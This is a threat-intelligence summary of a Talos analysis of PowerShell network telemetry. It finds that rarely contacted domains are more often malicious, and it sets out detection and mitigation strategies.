Full Report
Talos analyzed six months of PowerShell network telemetry and found that rare domains are over three times more likely to be malicious compared to frequently contacted ones.
Analysis Summary
# Tool/Technique: PowerShell Network Connection Analysis
## Overview
This analysis summarizes security findings derived from reviewing six months of network connection telemetry logs specifically generated by various PowerShell processes to explore the correlation between domain contact frequency and malicious intent. It highlights a trend where domains rarely contacted by PowerShell are statistically more likely to host malicious activity compared to frequently contacted domains, though statistical significance was not reached in the study period.
## Technical Details
- Type: Technique (Risk correlation analysis)
- Platform: Windows (Implied by PowerShell processes: `powershell.exe`, `pwsh.exe`, etc.)
- Capabilities: Statistical analysis and threat hunting methodology based on domain contact rarity for PowerShell execution logs.
- First Seen: Analysis period covers June 1, 2024 – Dec. 31, 2024.
## MITRE ATT&CK Mapping
The observed activity primarily relates to initial execution or command and control via scripting environments.
- **TA0003 - Persistence** (Potential, if scripts are designed for persistence)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (Downloading scripts like PowerSploit)
## Functionality
### Core Capabilities
- **Data Collection:** Queried network connection logs for PowerShell processes (`powershell.exe`, `pwsh.exe`, etc.) over a six-month period.
- **Domain Extraction & Rarity Definition:** Extracted 742 unique base domains and defined rarity as $\le 5$ average contacts per full domain (resulting in 550 rare domains).
- **Threat Assessment:** Used ReversingLabs threat intelligence and manual review to flag domains as malicious.
- **Finding:** Rare domains exhibited a 3.18 times higher odds ratio of being malicious compared to frequently contacted domains (1.64% malicious rate vs. 0.52%).
### Advanced Features
- **Subdomain Specificity:** Identified malicious activity originating from a subdomain (`raw.githubusercontent.com`) of an otherwise non-rare, legitimate base domain (`githubusercontent.com`).
- **Process Comparison:** Applied the same heuristics to other command-line interpreters (`rundll32.exe`, Python, `cmd.exe`, `cscript.exe`, `wscript.exe`, `bash`, `zsh`) to show variance in results.
## Indicators of Compromise
(Note: No explicit IoCs are provided in the text; the focus is on the *type* of IoC identified through this methodology.)
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: The key indicator type is the **Rare Domain** as defined by contact frequency.
- Potential Malicious Example (Subdomain): `raw[.]githubusercontent[.]com` (when associated with malicious commands).
- Legitimate High-Use Domains Observed: `automox[.]com`, `launchdarkly[.]com`, `amazonaws[.]com`.
- Behavioral Indicators: Connections initiated by PowerShell to domains rarely contacted by the process.
## Associated Threat Actors
The article does not name specific threat actors; the analysis establishes a general security methodology based on telemetry analysis.
## Detection Methods
- **Frequency Analysis:** Monitoring connections made by PowerShell processes, prioritizing domains with very low contact counts in telemetry.
- **Subdomain Review:** Detailed manual or automated review of process arguments associated with connections to high-volume, legitimate domains (e.g., cloud services).
- **Threat Intelligence Integration:** Correlating domain connections against established threat intelligence feeds (e.g., ReversingLabs).
## Mitigation Strategies
- **Prioritize Rare Domain Investigation:** Focus security investigations on network connections to domains PowerShell communicates with infrequently.
- **Mandatory Subdomain/Content Analysis:** Never trust the base domain alone; actively inspect subdomains, especially for large cloud/dev platforms, for malicious payload hosting.
- **Refine Detection Logic:** Develop risk scoring systems that integrate contact frequency, TLDs, and existing threat intelligence feeds.
- **Investigate Anomalous Scripting Usage:** Pay special attention to infrequently used scripting interpreters like `wscript.exe` if they suddenly establish external network connections, as they showed a high likelihood of malicious use in this study.
## Related Tools/Techniques
- **Process Analysis:** Similar heuristics were analyzed for `rundll32.exe`, Python, `cmd.exe`, `cscript.exe`, `wscript.exe`, `bash`, and `zsh`.
- **Tool Mentioned in Context:** Downloads of PowerSploit and execution of `Invoke-Mimikatz` were observed linked to the malicious subdomain activity.